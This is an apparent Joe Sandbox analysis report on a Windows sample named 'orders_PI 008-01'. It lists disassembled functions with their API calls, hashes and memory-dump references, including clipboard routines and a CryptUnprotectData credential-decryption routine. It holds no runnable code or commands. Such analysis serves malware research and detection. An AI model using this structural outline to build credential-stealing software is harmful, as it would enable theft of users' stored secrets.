                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: Open
                                        • String ID:
                                        • API String ID: 71445658-0
                                        • Opcode ID: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                        • Instruction ID: 4e31294bd56c0fd8f54a78566f459ab053e1b17b284f5820c9a90ca28514d216
                                        • Opcode Fuzzy Hash: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                        • Instruction Fuzzy Hash: C4C09B35544311BFDE114F40FD09F09BB61BB84B05F004414B254640B182714414EB17
                                        Function 00409B98 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: AttributesFile
                                        • String ID:
                                        • API String ID: 3188754299-0
                                        • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                        • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                                        • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                        • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                                        Function 0041BE52 Relevance: 1.3, APIs: 1, Instructions: 99COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b24af7433d330108988894de74f75be26998b58131ab4cc11d8f9b1f19dcffda
                                        • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                                        • Opcode Fuzzy Hash: b24af7433d330108988894de74f75be26998b58131ab4cc11d8f9b1f19dcffda
                                        • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                                        Function 004095D9 Relevance: 1.3, APIs: 1, Instructions: 66COMMON
                                        Download Yara Rule
                                        APIs
                                        • memset.MSVCRT ref: 004095FC
                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                          • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                          • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                          • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                          • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                          • Part of subcall function 004091B8: memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                          • Part of subcall function 004091B8: memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                        • String ID:
                                        • API String ID: 3655998216-0
                                        • Opcode ID: 06dd2208bba870b09ae4b6a35152530ffce6bfcddb3583e774ca40d5f9d70baf
                                        • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                                        • Opcode Fuzzy Hash: 06dd2208bba870b09ae4b6a35152530ffce6bfcddb3583e774ca40d5f9d70baf
                                        • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                                        Function 00445403 Relevance: 1.3, APIs: 1, Instructions: 60COMMON
                                        Download Yara Rule
                                        APIs
                                        • memset.MSVCRT ref: 00445426
                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                          • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                          • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                          • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                          • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                          • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                          • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                          • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                          • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                        • String ID:
                                        • API String ID: 1828521557-0
                                        • Opcode ID: 30388877fc1f1466cb5fc4dbbd946ecf0cc3df28c932be715bfff3731eba89eb
                                        • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                        • Opcode Fuzzy Hash: 30388877fc1f1466cb5fc4dbbd946ecf0cc3df28c932be715bfff3731eba89eb
                                        • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                        Function 004068BF Relevance: 1.3, APIs: 1, Instructions: 59COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                          • Part of subcall function 004062A6: SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                        • memcpy.MSVCRT(00000000,00000000,?,00000000,00000000,?,00000000,0040627C), ref: 00406942
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: ??2@FilePointermemcpy
                                        • String ID:
                                        • API String ID: 609303285-0
                                        • Opcode ID: 56af1d3d616a015a3ecb908bea2399ecc0b12673b9d22b9fdb7fca1b43f88111
                                        • Instruction ID: a147fa8ec668463fbbadbca9a08a444fcb23aa95a0ceadfc627c4072e562ebd5
                                        • Opcode Fuzzy Hash: 56af1d3d616a015a3ecb908bea2399ecc0b12673b9d22b9fdb7fca1b43f88111
                                        • Instruction Fuzzy Hash: 4B11A7B2500108BBDB11A755C840F9F77ADDF85318F16807AF90677281C778AE2687A9
                                        Function 00406214 Relevance: 1.3, APIs: 1, Instructions: 39COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
                                          • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                        • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                          • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: File$CloseCreateErrorHandleLastRead
                                        • String ID:
                                        • API String ID: 2136311172-0
                                        • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                        • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                                        • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                        • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                                        Function 0040AFCF Relevance: 1.3, APIs: 1, Instructions: 12COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,0040AFD7,00000000,0040B608), ref: 0040B052
                                        • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: ??2@??3@
                                        • String ID:
                                        • API String ID: 1936579350-0
                                        • Opcode ID: b7d64a9db0ab8f7e7b6c625ee8b1c93a5659d73149cb5b89327274070e360fa5
                                        • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                                        • Opcode Fuzzy Hash: b7d64a9db0ab8f7e7b6c625ee8b1c93a5659d73149cb5b89327274070e360fa5
                                        • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
                                        Function 0040B633 Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: free
                                        • String ID:
                                        • API String ID: 1294909896-0
                                        • Opcode ID: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                        • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                                        • Opcode Fuzzy Hash: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                        • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                                        Function 0040AA04 Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: free
                                        • String ID:
                                        • API String ID: 1294909896-0
                                        • Opcode ID: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                        • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                                        • Opcode Fuzzy Hash: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                        • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                                        Function 00415308 Relevance: 1.3, APIs: 1, Instructions: 5COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: free
                                        • String ID:
                                        • API String ID: 1294909896-0
                                        • Opcode ID: 908a2f96169ffd3f5635234353574390e30f5bbba8146f1a6a93cc8e14f9cc97
                                        • Instruction ID: 5e082493cfe38c59748d9de5a46a99a47989c0e105afa31b953e1adb18ef7a34
                                        • Opcode Fuzzy Hash: 908a2f96169ffd3f5635234353574390e30f5bbba8146f1a6a93cc8e14f9cc97
                                        • Instruction Fuzzy Hash: 17900282455501105C0425755C06505110808A313A376074A7032955D1CE188060601D

                                        Non-executed Functions

                                        Function 004098E2 Relevance: 16.6, APIs: 11, Instructions: 59clipboardmemoryfileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • EmptyClipboard.USER32 ref: 004098EC
                                          • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                        • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                        • GlobalLock.KERNEL32(00000000), ref: 00409927
                                        • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                        • GlobalUnlock.KERNEL32(00000000), ref: 0040994C
                                        • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                        • GetLastError.KERNEL32 ref: 0040995D
                                        • CloseHandle.KERNEL32(?), ref: 00409969
                                        • GetLastError.KERNEL32 ref: 00409974
                                        • CloseClipboard.USER32 ref: 0040997D
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                        • String ID:
                                        • API String ID: 3604893535-0
                                        • Opcode ID: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                        • Instruction ID: b216396755dc4e0bfb1664a9ae46c4c33dbc75b884417c11e98c88a04b476fe2
                                        • Opcode Fuzzy Hash: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                        • Instruction Fuzzy Hash: 3D113D7A540204BBE7105FA6DC4CA9E7B78FB06356F10457AF902E22A1DB748901CB69
                                        Function 0040987A Relevance: 12.0, APIs: 8, Instructions: 42clipboardmemoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • EmptyClipboard.USER32 ref: 00409882
                                        • wcslen.MSVCRT ref: 0040988F
                                        • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                                        • GlobalLock.KERNEL32(00000000), ref: 004098AC
                                        • memcpy.MSVCRT(00000000,?,00000002,?,?,?,00411A1E,-00000210), ref: 004098B5
                                        • GlobalUnlock.KERNEL32(00000000), ref: 004098BE
                                        • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                                        • CloseClipboard.USER32 ref: 004098D7
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpywcslen
                                        • String ID:
                                        • API String ID: 1213725291-0
                                        • Opcode ID: 2c7da0a1169fa3e148b60bfefcefaa8efe46c1682b98611cbf8cde0c6b7c4e2a
                                        • Instruction ID: b754b6ca90195c8d8a6f67e3e00c953256c5cf8724ac1a445a604cc17dd28da6
                                        • Opcode Fuzzy Hash: 2c7da0a1169fa3e148b60bfefcefaa8efe46c1682b98611cbf8cde0c6b7c4e2a
                                        • Instruction Fuzzy Hash: 4AF0967B1402246BD2112FA6AC4DD2B772CFB86B56B05013AF90592251DA3448004779
                                        Function 004182CE Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetLastError.KERNEL32 ref: 004182D7
                                          • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                        • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                        • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                        • LocalFree.KERNEL32(?), ref: 00418342
                                        • free.MSVCRT ref: 00418370
                                          • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7556DF80,?,0041755F,?), ref: 00417452
                                          • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: FormatMessage$ByteCharErrorFreeLastLocalMultiVersionWidefreemalloc
                                        • String ID: OsError 0x%x (%u)
                                        • API String ID: 2360000266-2664311388
                                        • Opcode ID: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                        • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                                        • Opcode Fuzzy Hash: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                        • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                                        Function 0041183A Relevance: 4.5, APIs: 3, Instructions: 44fileclipboardCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                          • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                          • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                        • OpenClipboard.USER32(?), ref: 00411878
                                        • GetLastError.KERNEL32 ref: 0041188D
                                        • DeleteFileW.KERNEL32(?), ref: 004118AC
                                          • Part of subcall function 004098E2: EmptyClipboard.USER32 ref: 004098EC
                                          • Part of subcall function 004098E2: GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                          • Part of subcall function 004098E2: GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                          • Part of subcall function 004098E2: GlobalLock.KERNEL32(00000000), ref: 00409927
                                          • Part of subcall function 004098E2: ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                          • Part of subcall function 004098E2: GlobalUnlock.KERNEL32(00000000), ref: 0040994C
                                          • Part of subcall function 004098E2: SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                          • Part of subcall function 004098E2: CloseHandle.KERNEL32(?), ref: 00409969
                                          • Part of subcall function 004098E2: CloseClipboard.USER32 ref: 0040997D
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: ClipboardFile$Global$CloseTemp$AllocDataDeleteDirectoryEmptyErrorHandleLastLockNameOpenPathReadSizeUnlockWindows
                                        • String ID:
                                        • API String ID: 2633007058-0
                                        • Opcode ID: 0cde1a455cb318c00b32f556f5e8c7a3ba143a63badd7d8bcbff79f11634fc9a
                                        • Instruction ID: 30b21b9b2413019ae2959f490c9fe9c3e0a1eb79cd5a134b572bdad6ddd06780
                                        • Opcode Fuzzy Hash: 0cde1a455cb318c00b32f556f5e8c7a3ba143a63badd7d8bcbff79f11634fc9a
                                        • Instruction Fuzzy Hash: C7F0A4367003006BEA203B729C4EFDB379DAB80710F04453AB965A62E2DE78EC818518
                                        Function 00401806 Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: ??2@??3@memcpymemset
                                        • String ID:
                                        • API String ID: 1865533344-0
                                        • Opcode ID: 0071396e032f76671cb9f6bfe1f2b1364741fc1e38965bf138fca73b5b698f56
                                        • Instruction ID: 142cde259e2f0f6626273334703b570cf32d48e622dac596d848113b95f58250
                                        • Opcode Fuzzy Hash: 0071396e032f76671cb9f6bfe1f2b1364741fc1e38965bf138fca73b5b698f56
                                        • Instruction Fuzzy Hash: D7113C71900209EFDF10AF95C805AAE3B71FF09325F04C16AFD15662A1C7798E21EF5A
                                        Function 004018C0 Relevance: 1.5, APIs: 1, Instructions: 6nativeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • NtdllDefWindowProc_W.NTDLL(?,?,?,?,00401B0D,?,?,?), ref: 004018D2
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: NtdllProc_Window
                                        • String ID:
                                        • API String ID: 4255912815-0
                                        • Opcode ID: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                        • Instruction ID: 27e4c09127093a565ccbabfb03fa630377511b1425115cef73ae3fc8c8acf6c4
                                        • Opcode Fuzzy Hash: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                        • Instruction Fuzzy Hash: BEC0483A108200FFCA024B81DD08D0ABFA2BB98320F00C868B2AC0403187338022EB02
                                        Function 00402279 Relevance: 110.5, APIs: 9, Strings: 54, Instructions: 285COMMON
                                        Download Yara Rule
                                        APIs
                                        • _wcsicmp.MSVCRT ref: 004022A6
                                        • _wcsicmp.MSVCRT ref: 004022D7
                                        • _wcsicmp.MSVCRT ref: 00402305
                                        • _wcsicmp.MSVCRT ref: 00402333
                                          • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                          • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,Function_0004E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                        • memset.MSVCRT ref: 0040265F
                                        • memcpy.MSVCRT(?,?,00000011), ref: 0040269B
                                          • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                          • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                          • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                        • memcpy.MSVCRT(?,?,0000001C,?,?,00000000,?), ref: 004026FF
                                        • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                        • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                        Strings
